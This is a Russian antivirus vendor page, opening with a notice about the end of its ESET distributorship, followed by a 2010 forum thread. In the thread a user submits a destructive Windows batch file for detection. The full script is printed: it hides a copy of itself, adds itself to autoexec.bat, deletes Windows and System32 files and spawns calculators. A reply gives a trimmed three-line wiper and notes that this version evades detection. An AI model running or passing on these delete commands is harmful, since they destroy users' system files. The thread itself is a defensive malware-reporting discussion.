Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

[ Закрыто ] Обнаружен код который ломает ОС и даже Bios, прошу обновить базы и найти подобные, вирусы. , Написан через блокнот вашем антивирусником не определяется, по этому прошу обеспечить максимальную защиту, нехочу вновь попасться на такую шутку, вирус запускается только при его открытии.

RSS
@Echo off  
Echo вот ты и попал!!!
Date 21.12.12
If exist охринеть!!!.bat goto abc
:abc
Copy %0 охринеть!!!.bat
Attrib +h охринеть!!!.bat
Echo охринеть!!!.bat >>autoexec.bat
del c:Windows/q
del c:Windows\system32/q
del *.*/q

Label E: PRIDUROK
Echo НЕ ХОРОШО ОБИЖАТЬ ДЕВОЧЕК!!!

/q:
FOR /L %%i IN (1,1,1000) DO md %%i

start calc
start calc
start calc
start calc
start calc
start calc
---------------------------------------------------------------------------------------------------------------------------------------------
start calc - повторяется более 1000 раз!

Ответы

судя по коду вируса - работа студента))) изучают бат. А самые умные делают то что им хочется.
Цитата
ORION пишет:
судя по коду вируса - работа студента))) изучают бат. А самые умные делают то что им хочется.
Ну да всё верно)))
С тех.под. не отвечают
Алексей что там по данному файлу? Почему так долго нет ответа?
Изменено: vir - 24.04.2010 23:10:35


dura lex, sed lex
закон суров, но это - закон
Ура!!! :)  добавили  с базой 5062  
Защита в режиме реального времени файл D:\1js.txt JS/TrojanDownloader.Iframe.NHW троянская программа :D  :D
Изменено: vir - 26.04.2010 17:21:30


dura lex, sed lex
закон суров, но это - закон
да, стал определяться!!!
Цитата
vir пишет:
Ура!!!   добавили с базой 5062
Защита в режиме реального времени файл D:\1js.txt JS/TrojanDownloader.Iframe.NHW троянская программа    
Это хорошо.
Цитата
marshal64 пишет:
Вирус в частности делает следующее:
1) изменяет системное время;
2) отключает антивирусную защиту;
3) удаляет папку Windows;
4) удаляет все остальное;
5) и начинает вызывать калькулятор)
Батник удаляет содержимое папки Windows (без подпапок), папки Windows\system32 (без подпапок), содержимое папки, откуда запущен. Антивирус он никаким боком не отключает, калькулятор вызвать не сможет, т.к. до этого уже удалил.

И вы это всё серьезно? Каждый, на коленке написанный (криво к тому же), батник будете в базы заносить?
Кстати, урезанный вариант (с сохраненным деструктивным функционалом) уже не детектится... :)
Код
@Echo off
del c:Windows/q
del c:Windows\system32/q
del *.*/q


И кстати, интересно узнать, каким образом он "ломает даже BIOS"?
Изменено: Voidwalker - 30.04.2010 14:40:10 (добавлено)
Да, взлом биоса - это серьезно))
Цитата
zloyDi пишет:
Андрей
Будет ловится в версии баз 5050 как BAT/Agent.NGK
Если такое баловство будет постоянное, то скором времени модификации дойдут до 5-ти значных значений. Например, BAT/Agent.ХХХХХ
Читают тему